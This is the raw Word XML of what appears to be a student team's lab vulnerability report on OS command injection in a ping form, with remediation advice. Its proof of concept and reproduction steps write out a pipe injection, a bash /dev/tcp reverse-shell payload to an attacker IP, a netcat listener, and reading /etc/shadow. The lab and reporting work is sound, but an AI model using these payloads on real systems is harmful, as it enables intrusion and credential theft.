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C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>Vulnerability Repor</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20"/>
    <w:p w:rsidR="00DF6C20" w:rsidRPr="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF6C20">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CVE-ID: EDU-WEBLAB-2026-TEAM2-001</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20"/>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>Title:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS Command Injection in Ping Functionality Leading to Remote Code Execution with Root Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20"/>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>Affected Lab:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell-inject</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20"/>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>Component:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ping Functionality - IP Address Input Field</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20"/>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20"/>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>CVSS Vector:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20"/>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>CVSS Score:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20"/>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t xml:space="preserve">A critical OS command injection vulnerability exists in the ping functionality of the shell-inject machine due to insufficient input validation on the IP address field. Attackers can inject arbitrary shell commands using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metacharacters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> such as the pipe (|) operator, which are passed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unsanitized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to shell-dependent execution functions. This allows remote attackers to execute commands with root privileges, as demonstrated by obtaining a reverse shell with complete administrative access. The unauthenticated nature and trivial exploitation complexity make this an immediate critical security risk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20"/>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>Initial test payload to confirm command injection vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t xml:space="preserve">127.0.0.1 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20"/>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>Reverse shell payload for complete system compromise:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>127.0.0.1 | bash -c "bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/192.168.0.106/2222 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Steps to Reproduce:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Navigate to the ping functionality page on the shell-inject machine's web interface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79A1CB06" wp14:editId="4EF693C6">
            <wp:extent cx="5722620" cy="2331720"/>
            <wp:effectExtent l="19050" t="19050" r="11430" b="11430"/>
            <wp:docPr id="49698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6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>2. Enter a legitimate IP address (e.g., 127.0.0.1 or 8.8.8.8) in the IP address input field and submit the form</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>3. Verify that the application executes the ping command and returns standard ICMP echo results, confirming normal functionality</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t xml:space="preserve">4. Test for command injection by entering the payload `127.0.0.1 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>` in the IP address input field</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>5. Submit the malicious request and observe that the output displays both ping results and the result of the `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>` command, confirming successful OS command injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63782CB1" wp14:editId="14575E2A">
            <wp:extent cx="5730240" cy="2606040"/>
            <wp:effectExtent l="19050" t="19050" r="22860" b="22860"/>
            <wp:docPr id="922368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06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6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t xml:space="preserve">6. On the attacker machine (Kali Linux at IP 192.168.0.106), open a terminal and start a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener on port 2222 using the command: `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2222`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>7. Return to the vulnerable ping functionality input field on the shell-inject machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>8. Enter the reverse shell payload: `127.0.0.1 | bash -c "bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/192.168.0.106/2222 0&gt;&amp;1"` and submit the request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t xml:space="preserve">9. Observe that a reverse shell connection is immediately established on the attacker's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener, providing an interactive shell session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76969DC6" wp14:editId="0B2FBB0E">
            <wp:extent cx="5722620" cy="2164080"/>
            <wp:effectExtent l="19050" t="19050" r="11430" b="26670"/>
            <wp:docPr id="228373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64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6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>10. Execute the command `id` or `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>` in the reverse shell session to verify that the shell is running with root privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>11. Confirm complete system compromise by executing additional commands such as `ls /root`, `cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/shadow`, or other privileged operations that demonstrate full administrative access to the compromised system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17BDE911" wp14:editId="6BA2F402">
            <wp:extent cx="5730240" cy="2537460"/>
            <wp:effectExtent l="19050" t="19050" r="22860" b="15240"/>
            <wp:docPr id="316833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37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6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20"/>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t xml:space="preserve">1. Implement strict server-side input validation using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allowlists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that permit only valid IP address formats conforming to the regex pattern `^(\d{1,3}\.){3}\d{1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>,3</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}$` with additional range validation (0-255 per octet)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2. Completely eliminate the use of shell-dependent functions such as `system()`, `exec()`, `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()`, `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passthru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()`, or `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()` that invoke command interpreters with user-controlled input</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>3. Replace dangerous command execution functions with secure alternatives such as native language libraries (e.g., use socket-based ICMP implementations or language-specific ping libraries instead of invoking the OS ping utility)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>4. If system command execution is absolutely necessary, implement strict command parameterization using functions like `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>escapeshellarg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)` and `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>escapeshellcmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()`, though complete avoidance of shell execution is strongly preferred</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>5. Apply the principle of least privilege by ensuring the web application runs under a non-privileged user account with minimal system permissions, never as root or with elevated privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t xml:space="preserve">6. Deploy a Web Application Firewall (WAF) configured with rules to detect and block command injection patterns including shell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metacharacters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (|, &amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>, ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, $, `, \n, &amp;&amp;, ||, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>7. Implement comprehensive logging and monitoring to detect suspicious command execution attempts, including alerting on unusual process spawnin</w:t>
      </w:r>
      <w:r>
        <w:t>g from web application contexts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20"/>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>Discovered By:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6C20">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Team 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6C20" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20"/>
    <w:p w:rsidR="00150D4B" w:rsidRDefault="00DF6C20" w:rsidP="00DF6C20">
      <w:r>
        <w:t>Date:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> February 8, 2026</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00150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8F0110"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DBC4A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C20"/>
    <w:rsid w:val="00150D4B"/>
    <w:rsid w:val="00DF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B90AD-E232-436A-9889-97B44C96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Sarang.nene@outlook.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sarang.nene@outlook.com</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-08T22:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-08T22:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>